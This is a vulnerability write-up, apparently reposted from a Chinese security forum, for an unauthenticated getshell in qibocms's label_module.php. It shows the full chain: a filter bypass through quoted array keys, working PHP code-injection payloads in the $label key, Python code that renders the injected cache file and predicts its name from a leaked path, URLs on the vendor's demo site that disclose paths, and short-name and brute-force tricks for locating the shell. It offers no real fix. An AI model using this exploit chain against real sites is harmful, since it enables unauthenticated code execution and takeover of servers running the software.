All open-source systems of qibocms, Getshell

Source: Internet
Author: User
Tags: ereg


Getshell is possible in more than one place.

Looking at all of qibo's open-source systems: no login is needed to get a shell.

I had been stuck on this for a while because the quote cannot be closed directly, and asked P God for help.

The whole-site system is used for the demonstration.
______________________________________________________________________

P.S. Could someone send me an invitation code? /hx

Detailed description:

Global filter function:

```php
function Add_S($array){
    foreach($array as $key=>$value){
        if(!is_array($value)){
            @eregi("['\"&]+",$key) && die('error KEY!');
            $value=str_replace("&#x","& # x",$value);       // filter unsafe characters
            $value=preg_replace("/eval/i","eva l",$value);  // filter unsafe functions
            !get_magic_quotes_gpc() && $value=addslashes($value);
            $array[$key]=$value;
        }else{
            $array[$key]=Add_S($array[$key]);
        }
    }
    return $array;
}
```



At first glance the filtering looks watertight.

A quoted key in an ordinary scalar parameter is matched by the `eregi` check and the script dies with `error KEY!`.

For a request like `label[asd'][asd]=x`, however, the only key that reaches the `eregi` check is the inner `asd`: the outer key `asd'` has an array as its value, so it takes the `else` branch and is recursed into without ever being matched against the pattern. A key containing quotes therefore passes the filter as long as its value is an array.
 







label_module.php can be reached without logging in. The relevant fragment:

```php
}else{
    foreach($label AS $key=>$value){
        // var_dump($value);exit;   (debugging line added while testing)
        // a tag used for the first time has no cached value and shows up as array(); clear it
        if(is_array($value)){
            $label[$key]='';
        }
    }
    // write the cache
    if(time()-filemtime($FileName)>($webdb[label_cache_time]*60)){
        $_shows="<?php\r\n\$haveCache=1;\r\n";
        foreach($label AS $key=>$value){
            $value=addslashes($value);
            $_shows.="\$label['$key']=stripslashes('$value');\r\n";
        }
        write_file($FileName,$_shows.'?>');
    }
}
```





Because qibo registers every GET and POST parameter as a global variable (only names beginning with an underscore followed by capital letters are skipped):

```php
foreach($_POST AS $_key=>$_value){!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];}
foreach($_GET AS $_key=>$_value){!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];}
```



$label can therefore be controlled directly from the request.

The keys and values of that array are then written straight into the cache file.



Values are escaped twice: once by the global filter ($value=addslashes($value);) and once more in the cache writer, so a single quote in a value ends up in the file as \\\'.

The writer emits "\$label['$key']=stripslashes('$value');\r\n": stripslashes is not executed at write time, it is written into the file as source text and only runs when the cache file is included, so a value cannot break out of its quotes.

The key is a different story. The global filter does not addslashes the key (and cannot, since the key is an array index), so whatever is in the key lands in the file unescaped. Combined with the filter bypass above, that is enough.



That is how the data lands in the file.

A key that directly contains a single quote is matched by the global filter and the script exits, so use the bypass above and give the key an array value.
The line written is `$label['asd'']=stripslashes('');`.

Why is the argument to stripslashes empty? If it were not, the escape characters could be put to use as well. It is empty because we submitted `index.php?label[asd'][asd]=asda'`, so the value under the key `asd'` is an array, and label_module.php blanks array values:

```php
if(is_array($value)){$label[$key]='';}
```

So it is cleared.

At the beginning I was stuck: to close this `[` I would need to submit something like `yu']#`.

But the key is written inside the array subscript. If you want to write a `]` into the key, as in

http://web.com/qibov7/index.php?label[asd'][asd]=asda'

the `]` closes the `[` in the submitted data and the key is still `asd'`.

I was tangled up in this for a long time.

Later I asked P God, who solved it for me instantly.



P God's payload `['a'."${phpinfo()}".'']` uses the second pass of double-quote interpolation to get a shell.

So set the key to `a'."${phpinfo()}".'`, which contains no `]`.


 



Test whether it executes.

An error? Use the error-suppression operator here, i.e. `['a'."${@phpinfo()}".'']`; the submitted key is `a'."${@phpinfo()}".'`.


 




 





Executed successfully.



I simplified it later: the double-quote second parse is not actually needed.

`[''.phpinfo().'']`, i.e. the submitted key `'.phpinfo().'`, executes directly as well.

All along I had been thinking about closing the bracket. Alas.
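To make the whole chain concrete, here is a Python model of the two PHP snippets quoted above: the Add_S() global filter, whose key check only runs for scalar values, and the label_module.php cache writer. It is an added illustration, not qibo's code and not from the original post; parse_query() is a simplified stand-in for PHP's parse_str() that only handles name[k1][k2]=value, and get_magic_quotes_gpc() is assumed to be off. It prints the cache file each request would produce.

```python
"""Model of qibo's Add_S() global filter and the label_module.php cache writer.

Added illustration, not the project's code: the two PHP snippets from the
write-up are reproduced in Python so the cache file each request would
produce can be inspected without a PHP install.  parse_query() is a
simplified stand-in for PHP's parse_str() (only name[k1][k2]=value forms),
and get_magic_quotes_gpc() is assumed to be off.
"""
import re
from urllib.parse import unquote

KEY_RE = re.compile(r"""['"&]+""")   # @eregi("['\"&]+", $key) && die('error KEY!')


class ErrorKey(Exception):
    """Stands in for die('error KEY!')."""


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash before single quote, double quote, backslash, NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def parse_query(qs: str) -> dict:
    """Simplified parse_str(): name[k1][k2]=v -> nested dicts.  PHP rewrites '.' and
    ' ' to '_' only in the part before the first '['; bracket keys stay verbatim."""
    out = {}
    for pair in qs.split("&"):
        name, _, value = pair.partition("=")
        name, value = unquote(name), unquote(value)
        head = name.split("[", 1)[0]
        keys = [re.sub(r"[. ]", "_", head)] + re.findall(r"\[([^\]]*)\]", name[len(head):])
        node = out
        for k in keys[:-1]:
            node = node.setdefault(k, {})
        node[keys[-1]] = value
    return out


def add_s(array: dict) -> dict:
    """Add_S(): the key check and the value escaping run ONLY for scalar entries;
    an entry whose value is an array is recursed into and its own key is never checked."""
    out = {}
    for key, value in array.items():
        if not isinstance(value, dict):
            if KEY_RE.search(key):
                raise ErrorKey(key)
            value = value.replace("&#x", "& # x")                 # "unsafe characters"
            value = re.sub("eval", "eva l", value, flags=re.I)    # "unsafe functions"
            value = addslashes(value)                             # first escaping
            out[key] = value
        else:
            out[key] = add_s(value)
    return out


def render_label_cache(label: dict) -> str:
    """label_module.php writer: array values are blanked, scalar values are
    addslashes()'d a second time, and the KEY is dropped into PHP source as-is."""
    label = {k: ("" if isinstance(v, dict) else v) for k, v in label.items()}
    shows = "<?php\r\n$haveCache=1;\r\n"
    for key, value in label.items():
        value = addslashes(value)
        shows += "$label['%s']=stripslashes('%s');\r\n" % (key, value)
    return shows + "?>"


def cache_from_query(qs: str) -> str:
    """Whole chain: request -> Add_S() -> $label (variable overwrite) -> cache file text."""
    params = add_s(parse_query(qs))
    return render_label_cache(params.get("label", {}))


def filter_blocks(qs: str) -> bool:
    """True when Add_S() would die('error KEY!') on this request."""
    try:
        add_s(parse_query(qs))
    except ErrorKey:
        return True
    return False


if __name__ == "__main__":
    for qs in ("label[asd']=x",                   # quoted key on a scalar: dies
               "label[asd'][asd]=asda'",          # quoted key on an array: survives, broken PHP
               "label['.phpinfo().'][x]=1"):      # quoted key that is valid PHP: code execution
        print("request:", qs)
        print("  error KEY!" if filter_blocks(qs) else cache_from_query(qs))
        print()
```

The three sample requests reproduce the write-up: a quoted key in a scalar parameter dies; `label[asd'][asd]=asda'` survives the filter but only yields the broken line `$label['asd'']=stripslashes('');`; and `label['.phpinfo().'][x]=1` yields `$label[''.phpinfo().'']=stripslashes('');`, which is valid PHP and runs phpinfo() as soon as the cache file is included. A value with a quote, by contrast, arrives as `a\\\'b` inside the quotes and never breaks out.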





___________________________________________________________________________



The content is sorted out; now the file name.

```php
$FileName=ROOT_PATH."cache/label_cache/";
if(!is_dir($FileName)){
    makepath($FileName);
}
$FileName.=(ereg("\.php",basename($WEBURL))?preg_replace("/\.php(.*)/","",basename($WEBURL)):'index')."_".intval($ch)."_".intval($ch_pagetype)."_".intval($ch_module)."_".intval($ch_fid)."_".intval($city_id).'_'.substr(md5(getTpl("index",$chdb[main_tpl])),0,5).".php";
```





First, the directory is cache/label_cache/.

Now the file name itself, which is built from:

```php
"_".intval($ch)."_".intval($ch_pagetype)."_".intval($ch_module)."_".intval($ch_fid)."_".intval($city_id).'_'.substr(md5(getTpl("index",$chdb[main_tpl])),0,5).".php"
```

After this series of conversions, $ch is 1 and none of the other variables are defined, so intval() turns each of them into 0. The name is therefore index_1_0_0_0_0_ followed by the first five characters of md5(getTpl("index",$chdb[main_tpl])) and .php.

Now look at getTpl("index",$chdb[main_tpl]). It is simply the absolute path of the website plus the default template path.



Since the website's absolute path goes into the hash, we need somewhere that leaks it. There are plenty of places that do:



Http://v7.qibosoft.com/data/label_hf.php

Http://v7.qibosoft.com//do/fontimg.php

Http://v7.qibosoft.com//hack/gather/inc/show_system_fid.php



Taking a local test as an example:

D:\ApmServ\www\htdocs\qibov7\data\label_hf.php

The website's absolute path is D:\ApmServ\www\htdocs\qibov7.

Append the default template path /template/default/index.htm:

D:\ApmServ\www\htdocs\qibov7/template/default/index.htm

md5 of that string is 82e4a1041f04d2edb779e87b37623786.

substr(md5(getTpl("index",$chdb[main_tpl])),0,5) takes the first five characters, 82e4a.

Putting it together gives cache/label_cache/index_1_0_0_0_0_82e4a.php
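The file-name computation, as an added example in Python (not qibo's code and not from the original post): it replicates the $FileName expression quoted above so the cache path can be predicted from a leaked web root. It assumes, as the write-up states, that getTpl("index",$chdb[main_tpl]) resolves to the site's absolute path plus the default template /template/default/index.htm, that $ch is 1 and the other channel variables are unset; the D:\ApmServ root and the web.com host are the write-up's own example values. short_name_guess() covers the second method below (Windows 8.3 short names), which assumes the server still generates them.

```python
"""Predict qibo's label-cache file name from a leaked absolute web root.

Added example, not the project's code.  Mirrors the $FileName expression in
label_module.php; getTpl() is modelled as "web root + template path" as the
write-up describes, not as the real function.
"""
import hashlib
import posixpath
import re

DEFAULT_TPL = "/template/default/index.htm"   # assumed default template path


def get_tpl(root_path: str, main_tpl: str = "") -> str:
    """Stand-in for getTpl("index", $chdb[main_tpl]): absolute web root + template
    path (assumption taken from the write-up)."""
    return root_path + (main_tpl or DEFAULT_TPL)


def label_cache_name(root_path: str, weburl: str = "http://web.com/qibov7",
                     ch: int = 1, ch_pagetype: int = 0, ch_module: int = 0,
                     ch_fid: int = 0, city_id: int = 0, main_tpl: str = "") -> str:
    """cache/label_cache/<prefix>_<ch>_<pagetype>_<module>_<fid>_<city>_<md5[:5]>.php
    Unset PHP variables become 0 through intval(), hence the integer defaults."""
    base = posixpath.basename(weburl)                      # PHP basename($WEBURL)
    # ereg("\.php", basename) ? preg_replace("/\.php(.*)/", "", basename) : 'index'
    prefix = re.sub(r"\.php.*", "", base) if ".php" in base else "index"
    digest = hashlib.md5(get_tpl(root_path, main_tpl).encode("utf-8")).hexdigest()[:5]
    return "cache/label_cache/%s_%d_%d_%d_%d_%d_%s.php" % (
        prefix, int(ch), int(ch_pagetype), int(ch_module), int(ch_fid), int(city_id), digest)


def short_name_guess(long_name: str) -> str:
    """Windows 8.3 short-name form of a long file name (first six characters of the
    stem, '~1', three-character extension): the write-up's method 2 for when the
    md5 fragment is unknown.  Assumes 8.3 name generation is enabled on the volume."""
    stem, ext = long_name.rsplit(".", 1)
    return stem[:6] + "~1." + ext[:3]


if __name__ == "__main__":
    name = label_cache_name(r"D:\ApmServ\www\htdocs\qibov7")   # write-up's local example
    print(name)
    print(short_name_guess(posixpath.basename(name)))
```

The md5 fragment is only five hex characters, so when no path leak is available the remaining search space is 16^5 (about one million) names, which is what the "brute-force the five characters" remark below refers to.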
 





Method 2 for finding the file

On Windows with IIS you can guess the file with 8.3 short file names; on Windows with Apache it is even easier:

cache/label_cache/index_~1.php

That hits the file directly.

Of course, the five hex characters of the md5 fragment could also be brute-forced. Haha.
 


Solution:

I am not entirely clear on this one; think it through yourselves.

This file exists in every one of the open-source systems.

Fix each one.
